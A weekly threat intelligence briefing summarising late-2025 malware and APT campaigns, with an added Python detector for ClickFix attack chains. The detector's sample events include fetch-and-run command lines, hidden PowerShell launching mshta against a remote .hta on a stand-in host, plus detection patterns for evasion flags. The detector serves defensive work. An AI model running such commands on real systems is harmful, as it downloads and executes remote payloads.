Weekly Threat Briefing
Diamond Trail

Cyware Weekly Threat Intelligence, December 15–19, 2025


The Good

  • UK businesses are urged to integrate the Cyber Essentials (CE) scheme into their supply chains through a new playbook from the NCSC. This playbook outlines seven actionable steps to enhance cybersecurity, including assessing supply chain risks, defining security profiles for suppliers, and utilizing the Supplier Check tool to monitor compliance. Cybersecurity minister Liz Lloyd stressed the critical need for companies to address cyber risks within their supply chains, as only 14% of firms currently manage these risks effectively. 

The Bad

ESET researchers have identified LongNosedGoblin, a China-aligned APT group that has been conducting cyberespionage against targets in Southeast Asia and Japan since 2023. The group uses a tool dubbed NosyHistorian to harvest browser history for target identification. The Weaxor ransomware gang is leveraging the React2Shell insecure deserialization bug to bypass authentication and lock down corporate networks before defenders even realize they have been breached. Attackers are exploiting a fake "Word Online" extension error to trick users into installing the DarkGate malware. Using the "ClickFix" social engineering technique, the campaign persuades victims to run malicious commands disguised as troubleshooting steps.

  • ESET researchers have identified LongNosedGoblin, a China-aligned APT group that conducts cyberespionage against governmental entities in Southeast Asia and Japan. Active since at least September 2023, the group employs a sophisticated toolset, including malware like NosyHistorian and NosyDoor, which utilize Group Policy for lateral movement and cloud services like Microsoft OneDrive for command and control. NosyHistorian collects browser history to identify potential targets, while NosyDoor functions as a backdoor, gathering metadata and executing commands remotely. The group has demonstrated advanced evasion techniques, such as bypassing security measures and masquerading as legitimate files.

  • The YouTube Ghost Network is a malware distribution campaign utilizing compromised accounts to promote malicious videos, primarily targeting users interested in game cheats and cracked software. A key component of this campaign is GachiLoader, a heavily obfuscated Node.js loader that deploys additional malware, including a second-stage payload known as Kidkadi. This loader employs a novel technique called Vectored Overloading for PE injection, allowing it to manipulate legitimate DLLs to load malicious payloads. The campaign has been active for over nine months, with more than 100 videos accumulating approximately 220,000 views. GachiLoader uses various anti-analysis techniques to evade detection, such as checking for virtual environments and executing PowerShell commands to gather system information.

  • A critical vulnerability known as React2Shell (CVE-2025-55182) has been exploited by a ransomware gang to gain rapid access to corporate networks, deploying file-encrypting malware within a minute. This flaw, stemming from an insecure deserialization issue in the React Server Components' Flight protocol, allows remote code execution without authentication. Following its disclosure, both nation-state hackers and cybercriminals quickly leveraged React2Shell for various attacks, including cyberespionage and cryptocurrency mining. On December 5, a threat actor used this vulnerability to launch the Weaxor ransomware, a rebrand of the Mallox/FARGO operation, which targets public-facing servers. The attackers executed a series of commands to disable security measures and encrypt files, leaving ransom notes with payment instructions.

  • A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data.

  • An active phishing campaign, codenamed Operation MoneyMount-ISO, is targeting the Russian finance sector by delivering Phantom Stealer malware through malicious ISO files. Phishing emails masquerade as legitimate financial communications, urging recipients to confirm bank transfers. These emails contain ZIP archives that include ISO files, which, when executed, mount as virtual drives and launch Phantom Stealer. This malware is designed to extract sensitive information, such as cryptocurrency wallet data, Discord tokens, and browser passwords. Additionally, the campaign has seen the use of another implant called DUPERUNNER, which loads the AdaptixC2 framework. The attackers employ various tactics to compromise finance, legal, and aerospace sectors in Russia, utilizing spear-phishing techniques and redirecting users to phishing pages hosted on IPFS and Vercel to steal credentials.
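As an added defender-side example (not part of the original briefing), the ClickFix chain described in the "Word Online" item above, that is a browser launching PowerShell with hidden or bypass flags which then fetches a remote HTA such as dark.hta, can be scored from process-creation telemetry. The events, image names, domains and encoded blob below are constructed for illustration; the scoring thresholds are an assumption, not a published rule.

```python
import re

# Constructed sample process-creation events (parent image, child image,
# command line); these are illustrative, not telemetry from the campaign.
SAMPLE_EVENTS = [
    ("chrome.exe", "powershell.exe",
     'powershell -w hidden -ep bypass -c "mshta http://compromised.example/dark.hta"'),
    ("explorer.exe", "powershell.exe", "powershell -c Get-ChildItem C:\\Users"),
    ("msedge.exe", "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4A"),
    ("powershell.exe", "mshta.exe", "mshta.exe https://cdn.example.net/update.hta"),
    ("cmd.exe", "mshta.exe", "mshta.exe C:\\tools\\local.hta"),
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Flags ClickFix one-liners typically rely on: hidden window, policy bypass,
# no profile, or an encoded command blob (assumed indicators, not a full list).
SUSPICIOUS_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass|nop\b"
    r"|e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,})", re.I)
# A URL ending in .hta anywhere in the command line (mshta or a downloader).
REMOTE_HTA = re.compile(r"https?://[^\s\"']+\.hta\b", re.I)


def score_event(parent, child, cmdline):
    """Return (score, reasons) for one process-creation event."""
    parent, child = parent.lower(), child.lower()
    score, reasons = 0, []
    if parent in BROWSERS and child in SHELLS:
        score += 1
        reasons.append("shell launched directly from a browser")
    if child in SHELLS and SUSPICIOUS_FLAGS.search(cmdline):
        score += 1
        reasons.append("hidden/bypass/encoded shell flags")
    if REMOTE_HTA.search(cmdline):
        score += 2
        reasons.append("remote .hta referenced on the command line")
    return score, reasons


def find_clickfix_chains(events, threshold=2):
    """Return (index, score, reasons) for events at or above the threshold."""
    hits = []
    for i, (parent, child, cmdline) in enumerate(events):
        score, reasons = score_event(parent, child, cmdline)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {'; '.join(reasons)}")
```

A benign administrator running PowerShell from Explorer scores zero, while a browser-spawned shell with evasion flags or any remote .hta fetch crosses the threshold, which is the combination the briefing's ClickFix description hinges on.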

New Threats

The Lazarus Group is proving that old tricks can still learn new, dangerous code. A sophisticated new variant of the BeaverTail malware has been linked to this North Korean hacker group targeting cryptocurrency traders and financial institutions. A massive new botnet named Kimwolf has enslaved approximately 1.8 million Android-based devices to launch extensive DDoS attacks. A new Android MaaS called Cellik allows criminals to create trojanized versions of legitimate Google Play Store apps. Because the malware retains the original app's interface and functionality, it is nearly impossible for users to detect the infection.

  • A newly identified variant of the BeaverTail malware has been linked to North Korea's Lazarus Group, targeting cryptocurrency traders and financial institutions for espionage and financial gain. This JavaScript-based malware functions as both an information stealer and a loader, employing advanced obfuscation techniques such as layered Base64 and XOR encoding to conceal its activities. BeaverTail is distributed through various channels, including trojanized npm packages and fake job interview platforms, exploiting trust in development workflows. Since 2022, it has evolved into a modular, cross-platform framework capable of running on Windows, macOS, and Linux, featuring keylogging, screenshot capture, and clipboard monitoring. 

  • Kimsuky, a North Korean threat actor, has launched a campaign distributing a new variant of Android malware called DocSwap through QR codes on phishing sites that mimic the South Korean logistics firm CJ Logistics. The attackers use smishing texts and phishing emails disguised as delivery notifications to trick victims into clicking on malicious URLs. Once redirected, users are prompted to scan a QR code to download a fake shipment tracking app, which appears legitimate but contains malware. This app decrypts an embedded APK and activates a RAT that allows attackers to log keystrokes, capture audio, and access files. Additionally, Kimsuky has repackaged legitimate applications, like the BYCOM VPN, injecting malicious functionalities. The campaign also includes phishing sites that resemble popular platforms like Naver and Kakao, aimed at harvesting user credentials.

  • A new botnet named Kimwolf has compromised approximately 1.8 million Android-based devices, including TVs and set-top boxes, launching extensive DDoS attacks. This botnet, linked to the notorious AISURU, has executed around 1.7 billion attack commands within a short span. Primarily targeting residential TV boxes, Kimwolf infections are prevalent in countries such as Brazil, India, and the U.S. The malware utilizes advanced techniques, including DNS-over-TLS and Ethereum Name Service (ENS) domains, to enhance its resilience against takedown efforts. Notably, over 96% of the commands issued by Kimwolf focus on exploiting compromised devices for proxy services, reflecting a shift in attackers' strategies towards monetizing IoT device bandwidth. 

  • Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures. 

  • A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud. 

  • A new MaaS called SantaStealer is being promoted on Telegram and hacker forums, operating in memory to avoid detection. This malware is a rebranding of BluelineStealer and is offered in two subscription tiers: Basic for $175/month and Premium for $300/month. SantaStealer employs 14 data-collection modules, each running separately to steal information from browsers, cryptocurrency wallets, and messaging apps like Telegram and Discord. It exfiltrates stolen data in chunks to a hardcoded command-and-control endpoint. Despite claims of advanced evasion techniques, current samples have shown vulnerabilities and are easy to analyze, indicating poor operational security by the developers. The exact distribution methods for SantaStealer remain uncertain, but it may involve tactics like phishing and malicious software downloads.

  • A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based RAT called PyStoreRAT. These repositories, disguised as development utilities or OSINT tools, contain minimal code that silently downloads and executes a remote HTA file. PyStoreRAT is a modular implant capable of executing various payloads, including an information stealer named Rhadamanthys. The malware is spread through loader stubs embedded in repositories that appear appealing to developers and analysts. The threat actors utilize social media for promotion and manipulate repository metrics to appear legitimate. Once executed, PyStoreRAT can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files.
